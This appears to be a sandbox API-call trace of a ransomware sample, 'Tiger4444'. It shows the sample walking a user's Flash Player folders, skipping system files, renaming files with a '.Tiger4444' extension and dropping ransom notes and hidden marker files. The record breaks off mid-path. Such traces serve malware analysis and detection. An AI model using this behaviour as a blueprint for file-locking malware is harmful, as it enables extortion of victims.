lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0057.657] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe69631a4, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c26071, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe6c33729, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0xc5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.sol", cAlternateFileName="")) returned 1 [0057.657] lstrcmpiW (lpString1="settings.sol", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0057.657] lstrcmpiW (lpString1="settings.sol", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.657] lstrcmpiW (lpString1="settings.sol", lpString2="Tiger4444.exe") returned -1 [0057.657] lstrcmpiW (lpString1="settings.sol", lpString2=".") returned 1 [0057.657] lstrcmpiW (lpString1="settings.sol", lpString2="..") returned 1 [0057.657] lstrcmpiW (lpString1="settings.sol", lpString2="windows") returned -1 [0057.657] lstrcmpiW (lpString1="settings.sol", lpString2="bootmgr") returned 1 [0057.658] lstrcmpiW (lpString1="settings.sol", lpString2="pagefile.sys") returned 1 [0057.658] lstrcmpiW (lpString1="settings.sol", lpString2="boot") returned 1 [0057.658] lstrcmpiW (lpString1="settings.sol", lpString2="ids.txt") returned 1 [0057.658] lstrcmpiW (lpString1="settings.sol", lpString2="NTUSER.DAT") returned 1 [0057.658] lstrcpyW (in: lpString1=0x30aeb92, lpString2="settings.sol" | out: lpString1="settings.sol") returned="settings.sol" [0057.658] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\settings.sol", dwFileAttributes=0x0) returned 1 [0057.695] lstrlenW (lpString="settings.sol") returned 12 [0057.695] lstrlenW (lpString="Tiger4444") returned 9 [0057.695] lstrcmpiW (lpString1="tings.sol", lpString2="Tiger4444") returned 1 [0057.695] lstrlenW (lpString=".dll") returned 4 [0057.695] lstrcmpiW (lpString1=".sol", lpString2=".dll") returned 1 [0057.695] lstrlenW (lpString=".lnk") returned 4 [0057.695] lstrcmpiW (lpString1=".sol", lpString2=".lnk") returned 1 [0057.695] lstrlenW (lpString=".ini") returned 4 [0057.695] lstrcmpiW (lpString1=".sol", lpString2=".ini") returned 1 [0057.695] lstrlenW (lpString=".sys") returned 4 [0057.695] lstrcmpiW (lpString1=".sol", lpString2=".sys") returned -1 [0057.695] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\settings.sol" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\settings.sol"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b8 [0057.695] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0057.695] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14914848649) returned 1 [0057.695] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=197) returned 1 [0057.695] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0057.696] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71c80 [0057.696] CreateFileMappingW (hFile=0x2b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3d0, lpName=0x0) returned 0x2cc [0057.697] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3d0) returned 0xbe0000 [0057.698] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0057.698] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0057.698] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0057.698] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0057.698] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0057.698] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0057.698] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0057.698] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0057.698] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14915124600) returned 1 [0057.698] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0057.698] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71c80 | out: hHeap=0xc50000) returned 1 [0057.698] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0057.698] CloseHandle (hObject=0x2cc) returned 1 [0057.698] CloseHandle (hObject=0x2b8) returned 1 [0057.698] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\settings.sol.Tiger4444") returned 139 [0057.698] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\settings.sol" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\settings.sol"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\settings.sol.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\settings.sol.tiger4444"), dwFlags=0x1) returned 1 [0057.699] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe69631a4, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c26071, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe6c33729, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0xc5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.sol", cAlternateFileName="")) returned 0 [0057.699] FindClose (in: hFindFile=0xc73048 | out: hFindFile=0xc73048) returned 1 [0057.699] lstrcpyW (in: lpString1=0x30aeb92, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0057.699] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0057.700] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0057.701] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0057.701] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0057.701] CloseHandle (hObject=0x2b8) returned 1 [0057.701] CloseHandle (hObject=0x2c4) returned 1 [0057.701] GetCurrentThreadId () returned 0xfa8 [0057.701] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66308 [0057.701] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects" [0057.701] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc864e0 | out: hHeap=0xc50000) returned 1 [0057.701] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66300 | out: hHeap=0xc50000) returned 1 [0057.701] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects" [0057.701] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\" [0057.701] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\.BFC0E91B00AE8A0620D3" [0057.701] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0057.702] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0057.704] FlushFileBuffers (hFile=0x2c4) returned 1 [0057.705] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0057.705] CloseHandle (hObject=0x2c4) returned 1 [0057.706] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects") returned 70 [0057.706] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.706] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53d03fd, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53db3d7, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x8768ef60, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e88 [0057.706] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.706] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0057.706] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0057.706] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0057.706] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53d03fd, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53db3d7, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x8768ef60, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.706] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.706] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0057.706] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0057.706] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0057.706] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0057.706] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8768ef60, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8768ef60, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8768ef60, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0057.706] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.706] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0057.706] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53db3d7, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c61d87, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe6c61d87, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XCVUDUNH", cAlternateFileName="")) returned 1 [0057.706] lstrcmpiW (lpString1="XCVUDUNH", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0057.706] lstrcmpiW (lpString1="XCVUDUNH", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.707] lstrcmpiW (lpString1="XCVUDUNH", lpString2="Tiger4444.exe") returned 1 [0057.707] lstrcmpiW (lpString1="XCVUDUNH", lpString2=".") returned 1 [0057.707] lstrcmpiW (lpString1="XCVUDUNH", lpString2="..") returned 1 [0057.707] lstrcmpiW (lpString1="XCVUDUNH", lpString2="windows") returned 1 [0057.707] lstrcmpiW (lpString1="XCVUDUNH", lpString2="bootmgr") returned 1 [0057.707] lstrcmpiW (lpString1="XCVUDUNH", lpString2="pagefile.sys") returned 1 [0057.707] lstrcmpiW (lpString1="XCVUDUNH", lpString2="boot") returned 1 [0057.707] lstrcmpiW (lpString1="XCVUDUNH", lpString2="ids.txt") returned 1 [0057.707] lstrcmpiW (lpString1="XCVUDUNH", lpString2="NTUSER.DAT") returned 1 [0057.707] lstrcpyW (in: lpString1=0x30aeb36, lpString2="XCVUDUNH" | out: lpString1="XCVUDUNH") returned="XCVUDUNH" [0057.707] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66300 [0057.707] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xa0) returned 0xc611e0 [0057.707] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66308 | out: ListHead=0xc66828, ListEntry=0xc66308) returned 0xc664c8 [0057.707] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53db3d7, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c61d87, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe6c61d87, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XCVUDUNH", cAlternateFileName="")) returned 0 [0057.707] FindClose (in: hFindFile=0xc72e88 | out: hFindFile=0xc72e88) returned 1 [0057.707] lstrcpyW (in: lpString1=0x30aeb36, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0057.707] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0057.849] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0057.850] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0057.850] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0057.850] CloseHandle (hObject=0x2b8) returned 1 [0057.850] CloseHandle (hObject=0x2c4) returned 1 [0057.850] GetCurrentThreadId () returned 0xfa8 [0057.850] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66308 [0057.850] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH" [0057.850] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc611e0 | out: hHeap=0xc50000) returned 1 [0057.850] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66300 | out: hHeap=0xc50000) returned 1 [0057.850] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH" [0057.850] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\" [0057.850] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\.BFC0E91B00AE8A0620D3" [0057.850] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\xcvudunh\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0057.851] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0057.859] FlushFileBuffers (hFile=0x2c4) returned 1 [0057.860] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0057.860] CloseHandle (hObject=0x2c4) returned 1 [0057.861] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH") returned 79 [0057.861] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.861] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53db3d7, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c61d87, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x8780f4f2, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc730c8 [0057.861] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.861] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0057.861] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0057.861] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0057.861] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53db3d7, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c61d87, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x8780f4f2, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.861] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.861] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0057.861] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0057.861] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0057.862] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0057.862] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6c61d87, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c6cd5b, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe6c6cd5b, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="#AppContainer", cAlternateFileName="#APPCO~1")) returned 1 [0057.862] lstrcmpiW (lpString1="#AppContainer", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.862] lstrcmpiW (lpString1="#AppContainer", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0057.862] lstrcmpiW (lpString1="#AppContainer", lpString2="Tiger4444.exe") returned -1 [0057.862] lstrcmpiW (lpString1="#AppContainer", lpString2=".") returned -1 [0057.862] lstrcmpiW (lpString1="#AppContainer", lpString2="..") returned -1 [0057.862] lstrcmpiW (lpString1="#AppContainer", lpString2="windows") returned -1 [0057.862] lstrcmpiW (lpString1="#AppContainer", lpString2="bootmgr") returned -1 [0057.862] lstrcmpiW (lpString1="#AppContainer", lpString2="pagefile.sys") returned -1 [0057.862] lstrcmpiW (lpString1="#AppContainer", lpString2="boot") returned -1 [0057.862] lstrcmpiW (lpString1="#AppContainer", lpString2="ids.txt") returned -1 [0057.862] lstrcmpiW (lpString1="#AppContainer", lpString2="NTUSER.DAT") returned -1 [0057.862] lstrcpyW (in: lpString1=0x30aeb48, lpString2="#AppContainer" | out: lpString1="#AppContainer") returned="#AppContainer" [0057.862] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66300 [0057.862] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xbc) returned 0xc73f50 [0057.862] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66308 | out: ListHead=0xc66828, ListEntry=0xc66308) returned 0xc664c8 [0057.862] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8780f4f2, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8780f4f2, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8780f4f2, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0057.862] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.862] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0057.862] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8780f4f2, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8780f4f2, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8780f4f2, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0057.862] FindClose (in: hFindFile=0xc730c8 | out: hFindFile=0xc730c8) returned 1 [0057.862] lstrcpyW (in: lpString1=0x30aeb48, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0057.862] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\HOW TO BACK YOUR 